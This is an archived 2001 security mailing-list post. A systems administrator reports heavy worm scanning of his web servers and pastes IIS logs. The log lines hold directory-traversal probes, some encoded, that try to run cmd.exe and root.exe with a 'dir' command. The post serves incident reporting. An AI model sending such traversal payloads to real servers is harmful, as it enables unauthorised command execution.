I am as well being hit by this worm. Everything seems to be coming from the same class A 64.*. I have already seen 1500 plus scans to my web servers and that number is climbing rather fast. This seemed to suddenly pop up with little or no warning? In the past days I have seen a few scans here and there but nothing of this magnitude I am wondering what suddenly changed to cause this type of outbreak? 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 - 2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 403 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 - 2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 – Patrick Beam Senior Systems Administrator Agea Corp. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:19:15 PDT